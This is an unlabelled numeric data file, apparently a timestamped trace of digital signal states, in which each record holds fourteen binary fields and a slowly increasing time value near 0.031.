0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0873200e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0873228e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0873252e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0873276e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0873300e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0873324e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0873348e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0873376e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0873400e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0873428e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0873452e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0873476e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0873500e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0873524e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0873548e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0873576e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0873600e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0873628e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0873652e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0873676e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0873700e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0873724e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0873748e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0873776e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0873800e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0873828e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0873852e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0873876e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0873900e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0873924e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0873948e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0873976e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0874000e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0874028e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0874052e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0874076e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0874100e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0874124e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0874148e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0874176e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0874200e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0874228e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0874252e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,1,3.0998532e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,1,3.0998780e-02 1,1,0,1,1,0,0,0,0,0,0,1,0,1,3.0998808e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,1,3.0998828e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,1,3.0999108e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,1,3.0999132e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,1,3.0999136e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,1,3.0999176e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,1,3.0999204e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,1,3.0999208e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,1,3.0999228e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,1,3.0999252e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,1,3.0999276e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,1,3.0999300e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,1,3.0999324e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,1,3.0999348e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,1,3.0999356e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.0999364e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,3.0999400e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.0999428e-02 1,1,0,1,1,1,0,0,0,0,0,0,0,0,3.0999432e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0999436e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0999452e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0999476e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.0999480e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,3.0999524e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.0999548e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0999556e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0999576e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0999600e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0999628e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0999652e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0999676e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0999700e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0999724e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0999748e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.0999756e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,3.0999804e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.0999828e-02 1,1,0,1,1,1,0,0,0,0,0,0,0,0,3.0999832e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0999836e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0999852e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0999876e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.0999880e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,3.0999924e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.0999948e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0999956e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1000004e-02 1,1,0,1,1,0,0,0,0,1,0,0,0,0,3.1000028e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.1000032e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,3.1000052e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.1000076e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,3.1000100e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.1000124e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,3.1000148e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.1000176e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1000180e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1000228e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1000252e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1000276e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1000300e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1000352e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1000376e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.1000380e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,3.1000400e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.1000428e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,3.1000452e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.1000476e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,3.1000500e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.1000524e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1000532e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1000576e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1000600e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.1000604e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,3.1000652e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.1000676e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1000684e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1000700e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1000724e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1000748e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1000776e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1000800e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1000828e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1000876e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1000900e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.1000908e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,3.1000952e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.1000976e-02 1,1,0,1,1,1,0,0,0,0,0,0,0,0,3.1000980e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1000984e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1001028e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1001052e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1001076e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1001100e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1001124e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1001148e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.1001156e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,3.1001176e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.1001200e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1001208e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1001252e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1001276e-02 1,1,0,1,1,0,0,0,0,1,0,0,0,0,3.1001280e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.1001284e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,3.1001300e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.1001324e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,3.1001348e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.1001376e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,3.1001400e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.1001428e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1001432e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1001476e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1001500e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1001524e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1001548e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.1001556e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,3.1001604e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.1001628e-02 1,1,0,1,1,1,0,0,0,0,0,0,0,0,3.1001632e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1001636e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1001676e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1001700e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.1001708e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,3.1001724e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.1001748e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,3.1001776e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.1001796e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,3.1001828e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.1001848e-02 1,1,0,1,1,1,0,0,0,0,0,0,0,0,3.1001856e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1001860e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1001900e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1001924e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1001948e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1001972e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1002024e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1002048e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.1002052e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,3.1002076e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.1002100e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1002108e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1002124e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1002148e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1002172e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1002196e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.1002204e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,3.1002248e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.1002276e-02 1,1,0,1,1,1,0,0,0,0,0,0,0,0,3.1002280e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1002284e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1002300e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1002324e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1002348e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1002372e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.1002380e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,3.1002396e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.1002424e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1002428e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1002476e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1002500e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.1002504e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,3.1002524e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.1002548e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,3.1002572e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.1002596e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,3.1002624e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.1002648e-02 1,1,0,1,1,1,0,0,0,0,0,0,0,0,3.1002652e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1002656e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1002704e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1002732e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1002756e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1002780e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1002804e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1002828e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1002856e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1002880e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1002908e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1002932e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1002956e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1002980e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1003004e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1003028e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1003056e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1003080e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1003108e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1003132e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1003156e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1003180e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1003204e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1003228e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1003256e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1003280e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1003308e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1003332e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1003356e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1003380e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1003404e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1003428e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1003456e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1003480e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1003508e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1003532e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1003556e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1003580e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1003604e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1003628e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1003656e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1003680e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1003708e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1003732e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1003756e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1003780e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1003804e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1003828e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1003856e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1003880e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1003908e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1003932e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1003956e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1003980e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1004004e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1004028e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1004056e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1004080e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1004108e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1004132e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1004156e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1004180e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1004204e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1004228e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1004256e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1004280e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1004308e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1004332e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1004356e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1004380e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1004404e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1004428e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1004456e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1004480e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1004508e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1004532e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1004556e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1004580e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1004604e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1004628e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1004656e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1004680e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1004708e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1004732e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1004756e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1004780e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1004804e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1004828e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1004856e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1004880e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1004908e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1004932e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1004956e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1004980e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1005004e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1005028e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1005056e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1005080e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1005108e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1005132e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1005156e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1005180e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1005204e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1005228e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1005256e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1005280e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1005308e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1005332e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1005356e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1005380e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1005404e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1005428e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1005456e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1005480e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1005508e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1005532e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1005556e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1005580e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1005604e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1005628e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1005656e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1005680e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1005708e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1005732e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1005756e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1005780e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1005804e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1005828e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1005856e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1005880e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1005908e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1005932e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1005956e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1005980e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.1006004e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.1006028e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,1,3.1130436e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,1,3.1130620e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,1,3.1130636e-02 0,0,1,1,1,0,0,0,0,0,0,1,0,1,3.1130668e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,1,3.1130692e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,1,3.1130984e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,1,3.1131008e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,1,3.1131012e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,1,3.1131060e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,1,3.1131084e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,1,3.1131092e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,1,3.1131108e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,1,3.1131132e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,1,3.1131184e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,1,3.1131208e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,1,3.1131236e-02 0,0,1,1,1,0,0,0,0,1,0,0,0,1,3.1131260e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,1,3.1131264e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,3.1131268e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,3.1131308e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,3.1131332e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1131340e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1131356e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1131384e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,3.1131388e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,3.1131436e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,3.1131460e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1131468e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1131484e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1131508e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1131532e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1131556e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1131584e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1131608e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1131636e-02 0,0,1,1,1,0,0,0,0,1,0,0,0,0,3.1131660e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,3.1131664e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,3.1131708e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,3.1131732e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1131740e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1131756e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1131784e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,3.1131788e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,3.1131836e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,3.1131860e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,3.1131884e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,3.1131908e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1131916e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1131932e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1131956e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1131984e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1132008e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1132036e-02 0,0,1,1,1,0,0,0,0,1,0,0,0,0,3.1132060e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,3.1132064e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,3.1132108e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,3.1132132e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1132140e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1132156e-02 